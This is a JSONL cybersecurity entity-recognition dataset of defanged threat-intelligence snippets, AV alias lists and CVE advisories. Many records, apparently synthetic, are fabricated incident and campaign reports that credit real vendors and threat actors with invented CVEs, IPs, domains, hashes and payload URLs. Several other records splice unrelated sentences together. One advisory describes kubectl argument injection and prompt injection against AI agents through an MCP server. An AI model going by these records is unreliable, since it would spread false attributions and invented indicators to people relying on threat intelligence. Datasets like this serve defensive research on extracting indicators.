{"text": "Tap Menu > Play Protect . Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December . The sole indicator on the source host that at[ . ]exe had been run was an application Prefetch file ( C:\\Windows\\Prefetch\\AT[.]EXE-BB02E639[.]pf ) that was created when the tool was executed . The Metasploit code was released on December 29 , 2012 and the vulnerability was officialy fixed on January 14 , 2013 ( MS13 - 008 ) while the page with the exploit was uploaded on February 11 , 2013 .", "spans": {"Organization: Palo Alto Networks AutoFocus": [[55, 83]], "Indicator: at.exe": [[367, 377]], "Indicator: C:\\Windows\\Prefetch\\AT.EXE-BB02E639.pf": [[426, 468]], "Vulnerability: vulnerability": [[580, 593]]}, "info": {"id": "cyberner_stix_train_007654", "source": "defanged_augment"}}
{"text": "According to the public information, cfm[ . ]com[ . ]ua domain belongs to the «Crystal Finance Millennium» software developer.", "spans": {"Organization: the «Crystal Finance Millennium» software developer.": [[74, 126]], "Indicator: cfm.com.ua": [[37, 55]]}, "info": {"id": "cyner2_train_003344", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.WinwebA.Trojan TrojanDropper.Henbang.A6 Win32.Worm.AutoRun.c W32/Adware.PXAH-3010 W32[ . ]Virut[ . ]CF Win32/SillyBHO.OL Worm.Win32.AutoRun.ibh Trojan.Win32.AutoRun.cqpmwl Trojan.MulDrop.32523 BehavesLike.Win32.AdwareBetterSurf.gh W32/Adware.ACXN Win32.Virut.cr.61440 TrojanDropper:Win32/Henbang.A Worm.Win32.AutoRun.ibh Win32.Trojan.Webdat.A Worm/Win32.AutoRun.R56346 Backdoor.WinNT.PcClient Win32/Worm.FakeFolder.FF", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[112, 132]]}, "info": {"id": "cyner2_train_005220", "source": "defanged_augment"}}
{"text": "IOC Bulletin - NjRAT Campaign:\nNetwork Indicators:\n- 192 [ . ] 141 [ . ] 160 [ . ] 215\n- 169 [ . ] 150 [ . ] 152 [ . ] 111\n- 197 [ . ] 164 [ . ] 73 [ . ] 61\n- update-sync[.]net\n- securebackup[.]live\nURLs:\n- hxxps://proxyedge[ . ]tech/portal/verify\n- hxxp://updateapi[.]io/gate.php\nEmail Senders:\n- report@auth-check[ . ]org\n- support@secure-verify[ . ]net\nFile Indicators:\n- SHA256: 07d74d8ab071f8be242bc15510b1edb860eb63b7a8426caceaad63213336f6df\n- SHA1: 7ca699f631f3ccebf72fe1da8c479403d7ed80c4\n- Drop path: /home/user/.config/lsass.dmp", "spans": {"Malware: NjRAT": [[15, 20]], "Indicator: 192.141.160.215": [[53, 86]], "Indicator: 169.150.152.111": [[89, 122]], "Indicator: 197.164.73.61": [[125, 156]], "Indicator: update-sync.net": [[159, 176]], "Indicator: securebackup.live": [[179, 198]], "Indicator: https://proxyedge.tech/portal/verify": [[207, 247]], "Indicator: http://updateapi.io/gate.php": [[250, 280]], "Indicator: report@auth-check.org": [[298, 323]], "Indicator: support@secure-verify.net": [[326, 355]], "Indicator: 07d74d8ab071f8be242bc15510b1edb860eb63b7a8426caceaad63213336f6df": [[383, 447]], "Indicator: 7ca699f631f3ccebf72fe1da8c479403d7ed80c4": [[456, 496]]}, "info": {"id": "synth_v2_01460", "source": "defanged_augment"}}
{"text": "A backdoor also known as: JS/Iframe.DGS Script.Trojan-Downloader.IFrame.AE Trojan-Downloader.JS.Iframe.deg Trojan.Script.Expack.bvtkmp PDF.DownLoader.3 BehavesLike.PDF.BadFile.db JS/BlacoleRef[ . ]CZ.29 Trojan[Downloader]/JS.Iframe.deg Trojan-Downloader.JS.Iframe.deg JS/Moat.241E54F!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BlacoleRef.CZ": [[182, 199]]}, "info": {"id": "cyner2_train_004650", "source": "defanged_augment"}}
{"text": "A backdoor also known as: W32.ShitOverVBx.PE Trojan.Win32.Cosmu!O W32.Lamer.EL3 Trojan.Downloader Downloader.VB.Win32.9689 Troj.Downloader.W32.VB.l4ji Trojan/Downloader.VB.eex TROJ_DLOADR.SMM Win32.Virus.VBbind.a W32/Worm.BAOX W32.Besverit Win32/VB.P TROJ_DLOADR.SMM Virus.Win32.Lamer.el Trojan.Win32.VB.csnpye Worm.Win32.VB.kp Win32.HLLW.Autoruner.6014 BehavesLike.Win32.Dropper.rh W32/Worm.EMYS-2108 Trojan/VB.kro WORM/VB.NVA Virus/Win32.Lamer.el Trojan:Win32/Dorv.A Trojan.Win32.Downloader.90650.B Virus.Win32.Lamer.el Win32.Application.Unwanted.B Dropper/Win32.Cosmu.R14017 SIM.Trojan.VBO.0859 Trojan.Cosmu Win32/AutoRun[.]VB[.]JP Worm.VB.FMYJ Worm.Win32 W32/OverDoom.A Worm.Win32.VB.C", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: AutoRun.VB.JP": [[617, 634]]}, "info": {"id": "cyner2_train_005360", "source": "defanged_augment"}}
{"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . The C&C server ( 82 [ . ] 137 [ . ] 255 [ . ] 56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 .", "spans": {"Organization: Government": [[106, 116]], "Organization: Defense": [[119, 126]], "Organization: Research": [[129, 137]], "Organization: Technology sectors": [[144, 162]], "Organization: US Defense": [[217, 227]], "Organization: satellite": [[241, 250]], "Organization: aerospace industries": [[255, 275]], "Indicator: 82.137.255.56": [[295, 326]]}, "info": {"id": "cyberner_stix_train_006833", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 BehavesLike[ . ]Win32[ . ]Trojan[ . ]cc TR/Crypt.ZPACK.oltlq Trojan.Barys.DD8C9 HackTool:Win64/Mimikatz.A Win-Trojan/MSILKrypt02.Exp Trojan.MSIL.Inject MSIL/Injector.QOT!tr Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Trojan.cc": [[69, 108]]}, "info": {"id": "cyner2_train_005484", "source": "defanged_augment"}}
{"text": "Cisco Talos published a threat intelligence report linking Scattered Spider to a new campaign exploiting CVE-2026-49052 in Atlassian Confluence. The attackers deployed StealC via WinPEAS, establishing C2 communication with 172[.]163[.]149[.]189 and portalmail[ . ]net. A secondary payload was downloaded from hxxps://cache-edge[.]org/assets/js/payload.js. The malware binary (MD5: 79798afe27b70af8dab3fb741dab7633) was dropped to /tmp/sam.hive. Phishing emails were sent from finance@secure-verify[ . ]net targeting enterprise users. A backup C2 server was identified at 148[.]124[.]166[.]97.", "spans": {"Organization: Cisco Talos": [[0, 11]], "Vulnerability: CVE-2026-49052": [[105, 119]], "System: Atlassian Confluence": [[123, 143]], "Malware: StealC": [[168, 174]], "Indicator: 172.163.149.189": [[223, 244]], "Indicator: portalmail.net": [[249, 267]], "Indicator: hxxps://cache-edge.org/assets/js/payload.js": [[309, 354]], "Indicator: 79798afe27b70af8dab3fb741dab7633": [[381, 413]], "Indicator: finance@secure-verify.net": [[476, 505]], "Indicator: 148.124.166.97": [[571, 591]]}, "info": {"id": "synth_v2_00089", "source": "defanged_augment"}}
{"text": "Sophos X-Ops published a threat intelligence report linking APT29 to a new campaign exploiting CVE-2026-35009 in Juniper SRX. The attackers deployed BlackCat via WinPEAS, establishing C2 communication with 39 [ . ] 71 [ . ] 167 [ . ] 239 and nodenode[.]io. A secondary payload was downloaded from hxxps://cachebackup[ . ]online/secure/token. The malware binary (MD5: ff480f115c2f9a8bfc917fd06825c91f) was dropped to C:\\Users\\Public\\Documents\\ntds.dit. Phishing emails were sent from notification@mail-service[.]info targeting enterprise users. A backup C2 server was identified at 42[.]201[.]153[.]152.", "spans": {"Organization: Sophos X-Ops": [[0, 12]], "Vulnerability: CVE-2026-35009": [[95, 109]], "System: Juniper SRX": [[113, 124]], "Malware: BlackCat": [[149, 157]], "Indicator: 39.71.167.239": [[206, 237]], "Indicator: nodenode.io": [[242, 255]], "Indicator: hxxps://cachebackup.online/secure/token": [[297, 340]], "Indicator: ff480f115c2f9a8bfc917fd06825c91f": [[367, 399]], "Indicator: notification@mail-service.info": [[483, 515]], "Indicator: 42.201.153.152": [[581, 601]]}, "info": {"id": "synth_v2_00066", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 96 [ . ] 27 [ . ] 54 [ . ] 170, the Microsoft MSRC IR team identified LockBit running as C:\\Program Files\\Common Files\\payload.bin. The threat actor, believed to be Volt Typhoon, used LinPEAS for credential harvesting and Mimikatz for lateral movement. Exfiltrated data was sent to loginapi[.]xyz and update-cache[.]live. The initial dropper (SHA1: 92b21d33d60cb17cc016bb67c04dc86ef88569c1) was delivered via a phishing email from account@mail-service[ . ]info. A second C2 node was observed at 172 [ . ] 80 [ . ] 15 [ . ] 38, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\beacon.dll.", "spans": {"Indicator: 96.27.54.170": [[64, 94]], "Organization: Microsoft MSRC": [[100, 114]], "Malware: LockBit": [[134, 141]], "Indicator: loginapi.xyz": [[346, 360]], "Indicator: update-cache.live": [[365, 384]], "Indicator: 92b21d33d60cb17cc016bb67c04dc86ef88569c1": [[413, 453]], "Indicator: account@mail-service.info": [[495, 524]], "Indicator: 172.80.15.38": [[559, 589]]}, "info": {"id": "synth_v2_00365", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2023-14679 is a critical use-after-free affecting Windows 11. ESET Research confirmed active exploitation by Aqua Blizzard in the wild. Exploitation delivers Qbot (SHA256: 7f34fe03dacea410e58a7dc58ae2341cabea11bd32d2b8538da43599cd053d6d) which is dropped to C:\\Users\\admin\\Downloads\\config.dat. The exploit payload is hosted at hxxp://edgeauth[.]dev/gate.php and communicates to 53[.]128[.]52[.]102 for C2.", "spans": {"Vulnerability: CVE-2023-14679": [[24, 38]], "Vulnerability: use-after-free": [[53, 67]], "System: Windows 11": [[78, 88]], "Organization: ESET Research": [[90, 103]], "Malware: Qbot": [[186, 190]], "Indicator: 7f34fe03dacea410e58a7dc58ae2341cabea11bd32d2b8538da43599cd053d6d": [[200, 264]], "Indicator: hxxp://edgeauth.dev/gate.php": [[356, 386]], "Indicator: 53.128.52.102": [[407, 426]]}, "info": {"id": "synth_v2_00682", "source": "defanged_augment"}}
{"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Merlin artifacts at C:\\ProgramData\\svchost.exe. Memory dump analysis confirmed execution of GhostPack. Registry modifications pointed to persistence via C:\\Program Files\\Common Files\\csrss.exe. Network forensics identified connections to 80[.]173[.]129[.]97 and api-backup[.]com. Email headers traced the initial vector to info@account-update[ . ]xyz. File C:\\Windows\\Tasks\\helper.sh (MD5: c211ee1e68447fe7d7870f46fbdacbb7) was identified as the initial dropper. A staging URL hxxps://cloud-api[ . ]cc/secure/token resolved to 192[.]176[.]62[.]7. Secondary artifact hash: SHA256: 8a5cc2effcc53140675759b5f3e5a15769f1b7faffbcd1d4121b3bfb95ac9363.", "spans": {"Indicator: 80.173.129.97": [[310, 329]], "Indicator: api-backup.com": [[334, 350]], "Indicator: info@account-update.xyz": [[395, 422]], "Indicator: c211ee1e68447fe7d7870f46fbdacbb7": [[462, 494]], "Indicator: https://cloud-api.cc/secure/token": [[549, 586]], "Indicator: 192.176.62.7": [[599, 617]], "Indicator: 8a5cc2effcc53140675759b5f3e5a15769f1b7faffbcd1d4121b3bfb95ac9363": [[652, 716]]}, "info": {"id": "synth_v2_01190", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Win32.Rimecud.1!O Trojan.Rimecud.U TROJ_RIMECUD.SMX Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_RIMECUD.SMX Trojan.Win32.Fsysna.eqph TrojWare.Win32.Kryptik.AMMN BehavesLike[ . ]Win32[ . ]PWSZbot[ . ]ch Virus.Win32.Cryptor Ransom:Win32/Grymegat.A Trojan.Kazy.D16E7F Trojan.Win32.Fsysna.eqph Trojan/Win32.Jorik.R40701 Trj/Rimecud.f W32/Rimecud.GRC!tr Win32/Trojan.801", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.PWSZbot.ch": [[198, 238]]}, "info": {"id": "cyner2_train_002777", "source": "defanged_augment"}}
{"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRevert \"libfs: fix infinite directory reads for offset dir\"\n\nThe current directory offset allocator (based on mtree_alloc_cyclic)\nstores the next offset value to return in octx->next_offset. This\nmechanism typically returns values that increase monotonically over\ntime. Eventually, though, the newly allocated offset value wraps\nback to a low number (say, 2) which is smaller than other already-\nallocated offset values.\n\nYu Kuai <yukuai3@huawei[.]com> reports that, after commit 64a7ce76fb90\n(\"libfs: fix infinite directory reads for offset dir\"), if a\ndirectory's offset allocator wraps, existing entries are no longer\nvisible via readdir/getdents because offset_readdir() stops listing\nentries once an entry's offset is larger than octx->next_offset.\nThese entries vanish persistently -- they can be looked up, but will\nnever again appear in readdir(3) output.\n\nThe reason for this is that the commit treats directory offsets as\nmonotonically increasing integer values rather than opaque cookies,\nand introduces this comparison:\n\n\tif (dentry2offset(dentry) >= last_index) {\n\nOn 64-bit platforms, the directory offset value upper bound is\n2^63 - 1. Directory offsets will monotonically increase for millions\nof years without wrapping.\n\nOn 32-bit platforms, however, LONG_MAX is 2^31 - 1. The allocator\ncan wrap after only a few weeks (at worst).\n\nRevert commit 64a7ce76fb90 (\"libfs: fix infinite directory reads for\noffset dir\") to prepare for a fix that can work properly on 32-bit\nsystems and might apply to recent LTS kernels where shmem employs\nthe simple_offset mechanism.", "spans": {"Indicator: huawei.com": [[508, 520]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-57952"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. The implementation of `tf.raw_ops.MaxPoolGrad` is vulnerable to a heap buffer overflow. The implementation(hxxps://github[.]com/tensorflow/tensorflow/blob/ab1e644b48c82cb71493f4362b4dd38f4577a1cf/tensorflow/core/kernels/maxpooling_op.cc#L194-L203) fails to validate that indices used to access elements of input/output arrays are valid. Whereas accesses to `input_backprop_flat` are guarded by `FastBoundsCheck`, the indexing in `out_backprop_flat` can result in OOB access. The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/ab1e644b48c82cb71493f4362b4dd38f4577a1cf/tensorflow/core/kernels/maxpooling_op.cc#L194-L203": [[178, 317]], "Vulnerability: buffer overflow": [[142, 157]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29579"}}
{"text": "Malware Analysis Report: Qbot (SHA256: 64f55ce017bf221672e98bc8e0d260c6c69297176c46b376cab60596ea4cb137). Upon execution on Ubuntu 22.04, the sample creates /etc/cron.d/payload.bin and injects into legitimate processes. Network analysis shows beaconing to 4[.]157[.]81[.]87 every 60 seconds and DNS queries to staticgateway[ . ]cc. The second stage was fetched from hxxps://static-login[ . ]io/secure/token and written to /etc/cron.d/shell.php. The payload uses PowerShell Empire-style techniques for defense evasion. A secondary hash (MD5: 7b6a675c5c4a58104ce84f59432e9ce4) was extracted from the unpacked payload.", "spans": {"Malware: Qbot": [[25, 29]], "Indicator: 64f55ce017bf221672e98bc8e0d260c6c69297176c46b376cab60596ea4cb137": [[39, 103]], "System: Ubuntu 22.04": [[124, 136]], "Indicator: 4.157.81.87": [[256, 273]], "Indicator: staticgateway.cc": [[310, 330]], "Indicator: https://static-login.io/secure/token": [[366, 406]], "Indicator: 7b6a675c5c4a58104ce84f59432e9ce4": [[541, 573]]}, "info": {"id": "synth_v2_00554", "source": "defanged_augment"}}
{"text": "These services appear to be running on all network interfaces and are therefore accessible to anyone sharing a local network with an infected device . The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry . Describes a resolution by the Asian Parliamentary Assembly ( APA ) held in Anatalya , announcing unlimited support for the Palestinian people 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c . jalsa[.]rar : The attackers behind Earth Vetala use features of remote access software to steal sensitive information or download malware for additional cyber operations , leveraging spearphishing emails and lure documents containing embedded links to a legitimate filesharing service Onehub to distribute archives containing the ScreenConnect remote administrator tool and RemoteUtilities software .", "spans": {"Organization: companies": [[211, 220]], "Organization: video game and software development industry": [[240, 284]], "Organization: Asian Parliamentary Assembly": [[317, 345]], "Organization: APA": [[348, 351]], "Indicator: 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c": [[429, 493]], "Indicator: jalsa.rar": [[496, 507]]}, "info": {"id": "cyberner_stix_train_004611", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2021-28231 is a critical privilege escalation affecting Apache Struts. Google TAG confirmed active exploitation by OilRig in the wild. Exploitation delivers RemcosRAT (SHA1: b325133fdedd0c4e671ac2fde32b98dd59cc2275) which is dropped to C:\\Windows\\System32\\payload.bin. The exploit payload is hosted at hxxps://nodelogin[ . ]dev/login and communicates to 10 [ . ] 145 [ . ] 11 [ . ] 203 for C2.", "spans": {"Vulnerability: CVE-2021-28231": [[24, 38]], "Vulnerability: privilege escalation": [[53, 73]], "System: Apache Struts": [[84, 97]], "Organization: Google TAG": [[99, 109]], "Malware: RemcosRAT": [[185, 194]], "Indicator: b325133fdedd0c4e671ac2fde32b98dd59cc2275": [[202, 242]], "Indicator: https://nodelogin.dev/login": [[330, 361]], "Indicator: 10.145.11.203": [[382, 413]]}, "info": {"id": "synth_v2_00720", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Zscaler ThreatLabz identified a large-scale phishing operation. Emails originated from confirm@secure-verify[.]net and finance@auth-check[ . ]org, spoofing legitimate services. Victims were directed to hxxps://backuprelay[ . ]club/wp-content/uploads/doc.php which hosted a credential harvesting page on static-auth[ . ]dev. A secondary link hxxps://updateauth[ . ]cc/secure/token delivered Dridex (MD5: 16980bdfc57b526c6c1fabe7989f8be5). The malware was saved to /dev/shm/ntds.dit and established C2 with 183[.]219[.]174[.]15.", "spans": {"Organization: Zscaler ThreatLabz": [[26, 44]], "Indicator: confirm@secure-verify.net": [[113, 140]], "Indicator: finance@auth-check.org": [[145, 171]], "Indicator: https://backuprelay.club/wp-content/uploads/doc.php": [[228, 283]], "Indicator: static-auth.dev": [[329, 348]], "Indicator: https://updateauth.cc/secure/token": [[367, 405]], "Malware: Dridex": [[416, 422]], "Indicator: 16980bdfc57b526c6c1fabe7989f8be5": [[429, 461]], "Indicator: 183.219.174.15": [[531, 551]]}, "info": {"id": "synth_v2_01071", "source": "defanged_augment"}}
{"text": "The executable file , xxxx[.]exe in this case , is then executed .", "spans": {"Indicator: xxxx.exe": [[22, 32]]}, "info": {"id": "cyberner_stix_train_005207", "source": "defanged_augment"}}
{"text": "Kirby is a content management system. A vulnerability in versions prior to 3[.]5[.]8[.]3, 3 [ . ] 6 [ . ] 6 [ . ] 3, 3 [ . ] 7 [ . ] 5 [ . ] 2, 3[.]8[.]4[.]1, and 3.9.6 affects all Kirby sites that might have potential attackers in the group of authenticated Panel users or that allow external visitors to upload an arbitrary file to the content folder. Kirby sites are not affected if they don't allow file uploads for untrusted users or visitors or if the file extensions of uploaded files are limited to a fixed safe list. The attack requires user interaction by another user or visitor and cannot be automated.\n\nAn editor with write access to the Kirby Panel could upload a file with an unknown file extension like `.xyz` that contains HTML code including harmful content like `<script>` tags. The direct link to that file could be sent to other users or visitors of the site. If the victim opened that link in a browser where they are logged in to Kirby and the file had not been opened by anyone since the upload, Kirby would not be able to send the correct MIME content type, instead falling back to `text/html`. The browser would then run the script, which could for example trigger requests to Kirby's API with the permissions of the victim.\n\nThe issue was caused by the underlying `Kirby\\Http\\Response::file()` method, which didn't have an explicit fallback if the MIME type could not be determined from the file extension. If you use this method in site or plugin code, these uses may be affected by the same vulnerability.\n\nThe problem has been patched in Kirby 3 [ . ] 5 [ . ] 8 [ . ] 3, 3 [ . ] 6 [ . ] 6 [ . ] 3, 3 [ . ] 7 [ . ] 5 [ . ] 2, 3 [ . ] 8 [ . ] 4 [ . ] 1, and 3.9.6. In all of the mentioned releases, the maintainers have fixed the affected method to use a fallback MIME type of `text/plain` and set the `X-Content-Type-Options: nosniff` header if the MIME type of the file is unknown.", "spans": {"Indicator: 3.5.8.3": [[75, 88], [1574, 1599]], "Indicator: 3.6.6.3": [[90, 115], [1601, 1626]], "Indicator: 3.7.5.2": [[117, 142], [1628, 1653]], "Indicator: 3.8.4.1": [[144, 157], [1655, 1680]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-38491"}}
{"text": "CrowdStrike published a threat intelligence report linking Storm-0558 to a new campaign exploiting CVE-2024-27359 in SonicWall SMA. The attackers deployed Vidar via PowerShell Empire, establishing C2 communication with 172[.]109[.]95[.]71 and backup-proxy[.]site. A secondary payload was downloaded from hxxp://cdnapi[ . ]info/download/update.exe. The malware binary (MD5: 21541cbf5664f89075a34fa4fc4b029e) was dropped to /tmp/loader.exe. Phishing emails were sent from helpdesk@urgent-notice[ . ]online targeting enterprise users. A backup C2 server was identified at 115[.]76[.]17[.]158.", "spans": {"Organization: CrowdStrike": [[0, 11]], "Vulnerability: CVE-2024-27359": [[99, 113]], "System: SonicWall SMA": [[117, 130]], "Malware: Vidar": [[155, 160]], "Indicator: 172.109.95.71": [[219, 238]], "Indicator: backup-proxy.site": [[243, 262]], "Indicator: http://cdnapi.info/download/update.exe": [[304, 346]], "Indicator: 21541cbf5664f89075a34fa4fc4b029e": [[373, 405]], "Indicator: helpdesk@urgent-notice.online": [[470, 503]], "Indicator: 115.76.17.158": [[569, 588]]}, "info": {"id": "synth_v2_00113", "source": "defanged_augment"}}
{"text": "A phishing email was received from it-admin@helpdesk-ticket[ . ]site with subject line 'Urgent Account Verification Required'. The email contained a hyperlink to hxxps://portal-auth[[ . ]]info/login/verify which redirected to a credential harvesting page. Victims who clicked the link also downloaded Ryuk (SHA256: 33af21e00813dd9554b194f7b8e5707a40c369ccedb2afd70840707b1e10e6a4) which was saved to C:\\ProgramData\\VMware\\update_service.dll.", "spans": {"Indicator: it-admin@helpdesk-ticket.site": [[35, 68]], "Indicator: hxxps://portal-auth[.]info/login/verify": [[162, 205]], "Malware: Ryuk": [[301, 305]], "Indicator: 33af21e00813dd9554b194f7b8e5707a40c369ccedb2afd70840707b1e10e6a4": [[315, 379]]}, "info": {"id": "synth_00093", "source": "defanged_augment"}}
{"text": "IOC Bulletin - StealC Campaign:\nNetwork Indicators:\n- 38[.]145[.]236[.]206\n- 172[.]141[.]93[.]111\n- 75[.]33[.]223[.]191\n- cache-secure[ . ]online\n- datacache[.]io\nURLs:\n- hxxps://data-edge[ . ]top/panel/index.html\n- hxxp://node-cache[ . ]xyz/admin/config\nEmail Senders:\n- billing@account-update[.]xyz\n- updates@urgent-notice[ . ]online\nFile Indicators:\n- MD5: f2bddb5fd30d982ec2b98b230e87bb56\n- SHA1: 0b474236969f06e0c5c7a46c6a42d3546978e89c\n- Drop path: C:\\Program Files\\Common Files\\loader.exe", "spans": {"Malware: StealC": [[15, 21]], "Indicator: 38.145.236.206": [[54, 74]], "Indicator: 172.141.93.111": [[77, 97]], "Indicator: 75.33.223.191": [[100, 119]], "Indicator: cache-secure.online": [[122, 145]], "Indicator: datacache.io": [[148, 162]], "Indicator: hxxps://data-edge.top/panel/index.html": [[171, 213]], "Indicator: http://node-cache.xyz/admin/config": [[216, 254]], "Indicator: billing@account-update.xyz": [[272, 300]], "Indicator: updates@urgent-notice.online": [[303, 335]], "Indicator: f2bddb5fd30d982ec2b98b230e87bb56": [[360, 392]], "Indicator: 0b474236969f06e0c5c7a46c6a42d3546978e89c": [[401, 441]]}, "info": {"id": "synth_v2_01387", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Dragos identified a large-scale phishing operation. Emails originated from support@auth-check[ . ]org and it@login-portal[.]tech, spoofing legitimate services. Victims were directed to hxxps://updatemail[ . ]link/admin/config which hosted a credential harvesting page on storage-static[.]live. A secondary link hxxp://proxy-cloud[.]cc/assets/js/payload.js delivered PlugX (MD5: 32e0030d5163c1897bfbfade7cacbce9). The malware was saved to C:\\Windows\\Temp\\winlogon.exe and established C2 with 192[.]164[.]210[.]116.", "spans": {"Organization: Dragos": [[26, 32]], "Indicator: support@auth-check.org": [[101, 127]], "Indicator: it@login-portal.tech": [[132, 154]], "Indicator: hxxps://updatemail.link/admin/config": [[211, 251]], "Indicator: storage-static.live": [[297, 318]], "Indicator: http://proxy-cloud.cc/assets/js/payload.js": [[337, 381]], "Malware: PlugX": [[392, 397]], "Indicator: 32e0030d5163c1897bfbfade7cacbce9": [[404, 436]], "Indicator: 192.164.210.116": [[517, 538]]}, "info": {"id": "synth_v2_00938", "source": "defanged_augment"}}
{"text": "TensorFlow is an end-to-end open source platform for machine learning. In affected versions an attacker can cause undefined behavior via binding a reference to null pointer in all operations of type `tf.raw_ops.MatrixSetDiagV*`. The [implementation](hxxps://github[.]com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/linalg/matrix_diag_op.cc) has incomplete validation that the value of `k` is a valid tensor. We have check that this value is either a scalar or a vector, but there is no check for the number of elements. If this is an empty tensor, then code that accesses the first element of the tensor is wrong. We have patched the issue in GitHub commit ff8894044dfae5568ecbf2ed514c1a37dc394f1b. The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/linalg/matrix_diag_op.cc": [[250, 387]], "Indicator: ff8894044dfae5568ecbf2ed514c1a37dc394f1b": [[705, 745]], "Organization: GitHub": [[691, 697]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-37658"}}
{"text": "TG-3390 : american[.]blackcmd[.]com .", "spans": {"Indicator: american.blackcmd.com": [[10, 35]]}, "info": {"id": "cyberner_stix_train_004211", "source": "defanged_augment"}}
{"text": "Blog Post by Microsoft MSRC: Tracking Salt Typhoon's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2026-27486 against VMware ESXi deployments. The initial access vector involves spear-phishing emails from finance@urgent-notice[.]online delivering SmokeLoader. Post-compromise, the attackers deploy PlugX and use BloodHound for reconnaissance. C2 infrastructure includes 10 [ . ] 138 [ . ] 55 [ . ] 43 and apistatic[ . ]io. A staging server at hxxps://cdnedge[.]cc/wp-content/uploads/doc.php hosts additional tooling. Key artifact: C:\\Users\\Public\\Documents\\payload.bin (MD5: 4cef9e6649d9b6590b197a296edc4359).", "spans": {"Organization: Microsoft MSRC": [[13, 27]], "Vulnerability: CVE-2026-27486": [[130, 144]], "System: VMware ESXi": [[153, 164]], "Indicator: finance@urgent-notice.online": [[240, 270]], "Malware: SmokeLoader": [[282, 293]], "Malware: PlugX": [[333, 338]], "Indicator: 10.138.55.43": [[405, 435]], "Indicator: apistatic.io": [[440, 456]], "Indicator: https://cdnedge.cc/wp-content/uploads/doc.php": [[478, 525]], "Indicator: 4cef9e6649d9b6590b197a296edc4359": [[610, 642]]}, "info": {"id": "synth_v2_01505", "source": "defanged_augment"}}
{"text": "A backdoor also known as: TrojanDownloader.Rakhni Downloader.Rakhni.Win32.344 Trojan-Downloader.Win32.Rakhni.moc TrojanDownloader[ . ]Rakhni[ . ]hu TR/Dldr.Delf.ltfzo TrojanDownloader:Win32/Docdobex.A Trojan.Zusy.D3FCFF Trojan-Downloader.Win32.Rakhni.moc Downloader/Win32.Rakhni.C2136522 TrojanDownloader.Rakhni W32/Delf.CDW!tr.bdr Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: TrojanDownloader.Rakhni.hu": [[113, 147]]}, "info": {"id": "cyner2_train_006091", "source": "defanged_augment"}}
{"text": "mcp-server-kubernetes is a Model Context Protocol server for Kubernetes cluster management. Versions 3.4.0 and prior contain an argument injection vulnerability in the port_forward tool in src/tools/port_forward.ts, where a kubectl command is constructed via string concatenation with user-controlled input and then naively split on spaces before being passed to spawn(). Unlike all other tools in the codebase which correctly use array-based argument passing with execFileSync(), port_forward treats every space in user-controlled fields (namespace, resourceType, resourceName, localPort, targetPort) as an argument boundary, allowing an attacker to inject arbitrary kubectl flags. This enables exposure of internal Kubernetes services to the network by injecting --address=0 [ . ] 0 [ . ] 0 [ . ] 0, cross-namespace targeting by injecting additional -n flags, and indirect exploitation via prompt injection against AI agents connected to the MCP server. This issue has been fixed in version 3.5.0.", "spans": {"Indicator: 0.0.0.0": [[775, 800]], "System: Kubernetes": [[61, 71], [717, 727]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-39884"}}
{"text": "Bitpylock is a ransomware that encrypts files by using asymmetric keys and puts '.bitpy' as suffix once the encryption phase ended. The ransom note appears on the affected user's Desktop with the following name: \"# # HELP_TO_DECRYPT_YOUR_FILES # .html\". At the time of writing the ransom request is 0.8 BTC and the communication email is: helpbitpy@cock[ . ]li.", "spans": {"Indicator: helpbitpy@cock.li": [[339, 360]], "Malware: Bitpylock": [[0, 9]]}, "info": {"source": "defanged_augment", "name": "BitPyLock"}}
